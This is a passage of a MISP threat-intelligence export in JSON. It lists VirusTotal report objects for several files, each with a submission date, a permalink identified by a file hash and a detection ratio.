"object_relation": "last-submission",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "823fdaca-bb79-49fd-b865-e3e9d8dd86e3",
|
||
|
"value": "2019-05-16T09:42:04"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "3f1e2085-c793-4bb9-8022-5d037641c73e",
|
||
|
"value": "https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "2c1f9f4d-f9bb-442e-84f8-0f06c1b28d5f",
|
||
|
"value": "10/61"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "f5647ba0-86e7-40fa-92a2-7d0fe024a7c2",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "e2e51a40-0e8a-41df-a238-3176befa0d6d",
|
||
|
"value": "2019-05-15T20:41:35"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "2e637413-a76f-4b89-a5f1-1fb99c942c20",
|
||
|
"value": "https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "a84ca298-e8e4-4048-becf-05c209cfaa19",
|
||
|
"value": "1/60"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "9156df9c-4067-422e-bd38-8c3908e8ea5f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "f1406b9a-3d0d-4419-96dc-6400f3a9bbb1",
|
||
|
"value": "2019-05-13T02:37:29"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "69ee832e-72d0-4b4b-a11c-f57e0452a076",
|
||
|
"value": "https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "7d4b7e4e-98b2-4840-92ea-7f22911f5603",
|
||
|
"value": "0/58"
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
}
|